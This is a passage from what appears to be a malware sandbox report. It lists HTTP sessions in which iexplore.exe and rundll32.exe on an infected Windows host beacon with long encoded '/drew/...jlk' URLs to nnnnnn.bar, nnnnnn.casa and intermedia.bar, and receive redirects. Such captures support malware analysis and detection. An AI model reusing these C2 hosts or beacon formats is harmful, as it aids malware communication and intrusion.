                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  46 | 192.168.2.3 | 49879 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:21.590420008 CET | 12367 | OUT | GET /drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:24.286071062 CET | 12373 | IN | HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 326
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.
                  Jan 21, 2022 07:54:27.296308994 CET | 12377 | IN | HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 326
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.
                  Jan 21, 2022 07:54:33.312299013 CET | 12382 | IN | HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 326
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  47 | 192.168.2.3 | 49880 | 198.54.117.211 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:24.476659060 CET | 12374 | OUT | GET /drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  48 | 192.168.2.3 | 49882 | 192.64.119.233 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:44.176512003 CET | 12384 | OUT | GET /drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:54:47.055541039 CET | 12385 | IN | HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:46 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 331
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk'>Found</a>.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  49 | 192.168.2.3 | 49883 | 198.54.117.212 | 80 | C:\Windows\SysWOW64\rundll32.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:47.258850098 CET | 12386 | OUT | GET /drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  5 | 192.168.2.3 | 49749 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:52:32.171870947 CET | 1138 | OUT | GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  50 | 192.168.2.3 | 49884 | 192.64.119.233 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:47.639854908 CET | 12388 | OUT | GET /drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:54:49.835479975 CET | 12389 | IN | HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:49 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 319
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk'>Found</a>.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  51 | 192.168.2.3 | 49885 | 198.54.117.215 | 80 | C:\Windows\SysWOW64\rundll32.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:50.027798891 CET | 12390 | OUT | GET /drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  52 | 192.168.2.3 | 49886 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:07.581451893 CET | 12394 | OUT | GET /drew/zd0veKiw3e_2FVw/JJ7tbavOiQvA9d8rHF/MReVkRvio/SC3uRIruy_2BXo_2FvjQ/5wwzMoShaTYrGjtEhg7/Q4EU_2F58MrLDOMpnwDvQl/4oAzAGZ9KhB2P/11ho7azQ/oSQaJwmg4Z33JCzj8wVAL4y/p2pAzghuFr/NTjo_2FX5hnFJvVKJ/pSUsYhZ3ii5t/IXWGFfzs8Ne/P3kSZsDcK04c9o/M4TxQU3QgnIS7BTTFhUW8/eYRw_2Bi9Rap_2/FlW.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  53 | 192.168.2.3 | 49887 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:10.371342897 CET | 12395 | OUT | GET /drew/nTzA1Bin3XQcZS3BPXoT/VC_2Bwejhc_2FIgAnHO/80iaugMV57_2B03WjjJnn8/4gxAs_2BxmZF7/TOVjb2Ah/pgPNUHZ17T9L8wycKkEjCiK/jeMuH8DdRv/juOnp0_2FGJ7c6qP0/x_2Fz3dEM_2F/deoZvnQAfFk/Wc5jOa5bWcm0MC/RWrwyt3pkcQtiY4AsZ3n7/MKKE_2FX_2FFdYj9/qoI9Xq_2BCQEmwG/Nwb7IgT0IyCbKBnKn_/2FiegfuYZI5/GhR0CO9.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  54 | 192.168.2.3 | 49888 | 192.64.119.233 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:18.981075048 CET | 12396 | OUT | GET /drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:19.141344070 CET | 12397 | IN | HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:55:19 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 312
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk'>Found</a>.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  55 | 192.168.2.3 | 49889 | 192.64.119.233 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:19.304620981 CET | 12398 | OUT | GET /drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:19.464982033 CET12400INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:55:19 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 320
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk'>Found</a>.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  56 | 192.168.2.3 | 49890 | 198.54.117.210 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:19.340749979 CET12399OUTGET /drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  57 | 192.168.2.3 | 49891 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:19.661740065 CET12401OUTGET /drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  58 | 192.168.2.3 | 49893 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:30.693897963 CET12402OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.135282040 CET12403OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.666309118 CET12404OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:32.635396957 CET12406OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:34.557248116 CET12406OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:38.385730028 CET12407OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:46.042517900 CET12410OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  59 | 192.168.2.3 | 49892 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
